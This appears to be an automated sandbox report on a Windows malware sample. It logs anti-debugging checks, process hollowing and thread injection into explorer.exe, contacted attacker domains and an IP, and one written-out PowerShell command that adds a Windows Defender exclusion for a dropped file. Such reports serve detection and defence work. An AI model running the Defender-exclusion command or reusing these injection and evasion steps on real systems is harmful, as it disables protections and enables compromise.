Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 mov eax, dword ptr fs:[00000030h] 29_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 mov eax, dword ptr fs:[00000030h] 29_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 mov eax, dword ptr fs:[00000030h] 29_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 mov eax, dword ptr fs:[00000030h] 29_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A942F70 mov eax, dword ptr fs:[00000030h] 29_2_6A942F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916F60 mov eax, dword ptr fs:[00000030h] 29_2_6A916F60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916F60 mov eax, dword ptr fs:[00000030h] 29_2_6A916F60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93E760 mov eax, dword ptr fs:[00000030h] 29_2_6A93E760
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93E760 mov eax, dword ptr fs:[00000030h] 29_2_6A93E760
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8F6A mov eax, dword ptr fs:[00000030h] 29_2_6A9E8F6A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CF6A mov eax, dword ptr fs:[00000030h] 29_2_6A94CF6A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CF6A mov eax, dword ptr fs:[00000030h] 29_2_6A94CF6A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91649B mov eax, dword ptr fs:[00000030h] 29_2_6A91649B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91649B mov eax, dword ptr fs:[00000030h] 29_2_6A91649B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91EC9B mov eax, dword ptr fs:[00000030h] 29_2_6A91EC9B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91EC9B mov eax, dword ptr fs:[00000030h] 29_2_6A91EC9B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D4496 mov eax, dword ptr fs:[00000030h] 29_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A911480 mov eax, dword ptr fs:[00000030h] 29_2_6A911480
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914CB0 mov eax, dword ptr fs:[00000030h] 29_2_6A914CB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94D4B0 mov eax, dword ptr fs:[00000030h] 29_2_6A94D4B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E9CB3 mov eax, dword ptr fs:[00000030h] 29_2_6A9E9CB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8CD6 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8CD6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912CDB mov eax, dword ptr fs:[00000030h] 29_2_6A912CDB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CCC0 mov eax, dword ptr fs:[00000030h] 29_2_6A94CCC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CCC0 mov eax, dword ptr fs:[00000030h] 29_2_6A94CCC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CCC0 mov eax, dword ptr fs:[00000030h] 29_2_6A94CCC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CCC0 mov eax, dword ptr fs:[00000030h] 29_2_6A94CCC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D14FB mov eax, dword ptr fs:[00000030h] 29_2_6A9D14FB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CD4E1 mov eax, dword ptr fs:[00000030h] 29_2_6A9CD4E1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8C14 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8C14
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92FC01 mov eax, dword ptr fs:[00000030h] 29_2_6A92FC01
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92FC01 mov eax, dword ptr fs:[00000030h] 29_2_6A92FC01
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92FC01 mov eax, dword ptr fs:[00000030h] 29_2_6A92FC01
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92FC01 mov eax, dword ptr fs:[00000030h] 29_2_6A92FC01
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E740D mov eax, dword ptr fs:[00000030h] 29_2_6A9E740D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E740D mov eax, dword ptr fs:[00000030h] 29_2_6A9E740D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E740D mov eax, dword ptr fs:[00000030h] 29_2_6A9E740D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D1C06 mov eax, dword ptr fs:[00000030h] 29_2_6A9D1C06
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A932430 mov eax, dword ptr fs:[00000030h] 29_2_6A932430
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914439 mov eax, dword ptr fs:[00000030h] 29_2_6A914439
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94BC2C mov eax, dword ptr fs:[00000030h] 29_2_6A94BC2C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8450 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8450
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A955C70 mov eax, dword ptr fs:[00000030h] 29_2_6A955C70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92FC77 mov eax, dword ptr fs:[00000030h] 29_2_6A92FC77
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8C75 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8C75
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94AC7B mov eax, dword ptr fs:[00000030h] 29_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93746D mov eax, dword ptr fs:[00000030h] 29_2_6A93746D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913591 mov eax, dword ptr fs:[00000030h] 29_2_6A913591
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DB581 mov eax, dword ptr fs:[00000030h] 29_2_6A9DB581
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A941DB5 mov eax, dword ptr fs:[00000030h] 29_2_6A941DB5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9435A1 mov eax, dword ptr fs:[00000030h] 29_2_6A9435A1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CFDD3 mov eax, dword ptr fs:[00000030h] 29_2_6A9CFDD3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9115C1 mov eax, dword ptr fs:[00000030h] 29_2_6A9115C1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9195F0 mov eax, dword ptr fs:[00000030h] 29_2_6A9195F0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9195F0 mov ecx, dword ptr fs:[00000030h] 29_2_6A9195F0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C8DF1 mov eax, dword ptr fs:[00000030h] 29_2_6A9C8DF1
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9495EC mov eax, dword ptr fs:[00000030h] 29_2_6A9495EC
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D3518 mov eax, dword ptr fs:[00000030h] 29_2_6A9D3518
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F51D mov eax, dword ptr fs:[00000030h] 29_2_6A91F51D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91AD30 mov eax, dword ptr fs:[00000030h] 29_2_6A91AD30
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8D34 mov eax, dword ptr fs:[00000030h] 29_2_6A9E8D34
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944D3B mov eax, dword ptr fs:[00000030h] 29_2_6A944D3B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A941520 mov eax, dword ptr fs:[00000030h] 29_2_6A941520
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A937D50 mov eax, dword ptr fs:[00000030h] 29_2_6A937D50
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A953D43 mov eax, dword ptr fs:[00000030h] 29_2_6A953D43
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C8D47 mov eax, dword ptr fs:[00000030h] 29_2_6A9C8D47
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C3D40 mov eax, dword ptr fs:[00000030h] 29_2_6A9C3D40
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91354C mov eax, dword ptr fs:[00000030h] 29_2_6A91354C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93C577 mov eax, dword ptr fs:[00000030h] 29_2_6A93C577
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_02C00D90 mov eax, dword ptr fs:[00000030h] 33_2_02C00D90
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_02C0092B mov eax, dword ptr fs:[00000030h] 33_2_02C0092B
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\cviueca Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\192F.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 0_2_00426320 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00426320
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A946B90 rdtsc 29_2_6A946B90
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 26_1_004026C8 LdrLoadDll, 26_1_004026C8
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 0_2_00426320 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00426320
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 0_2_0041D090 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041D090
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 22_2_00426320 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_00426320
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 22_2_0041D090 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_0041D090

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: iyc.jelikob.ru
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Domain query: znpst.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 319A.exe.7.dr
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\cviueca Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\cviueca Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\192F.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\192F.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\cviueca Memory written: C:\Users\user\AppData\Roaming\cviueca base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Memory written: unknown base: 400000 value starts with: 4D5A
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Roaming\cviueca Code function: 22_2_02C70110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 22_2_02C70110
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Thread created: C:\Windows\explorer.exe EIP: 3111920
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Thread created: unknown EIP: 4EC1920
Source: C:\Users\user\AppData\Roaming\cviueca Thread created: unknown EIP: 5011920
Source: C:\Users\user\AppData\Local\Temp\192F.exe Thread created: unknown EIP: 54219C0
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Thread created: unknown EIP: 5051920
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\5D4.exe' -Force
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Section unmapped: unknown base address: 400000
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process created: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Process created: C:\Users\user\Desktop\SkB6zJ6H3N.exe 'C:\Users\user\Desktop\SkB6zJ6H3N.exe'
Source: C:\Users\user\AppData\Roaming\cviueca Process created: C:\Users\user\AppData\Roaming\cviueca C:\Users\user\AppData\Roaming\cviueca
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Process created: C:\Users\user\AppData\Local\Temp\97A5.exe C:\Users\user~1\AppData\Local\Temp\97A5.exe
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\5D4.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process created: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe' /SpecialRun 4101d8 4288
Source: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe Process created: unknown unknown
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 32_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError, 32_2_00401C26
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 29_2_6A94E730
Source: explorer.exe, 00000007.00000000.292972549.0000000001400000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 00000007.00000000.267477940.0000000005F40000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.292972549.0000000001400000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.292972549.0000000001400000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.280135901.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 00000007.00000000.270521490.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\5D4.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Users\user\AppData\Local\Temp\EDD.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\319A.exe Queries volume information: C:\Users\user\AppData\Local\Temp\319A.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\319A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\319A.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
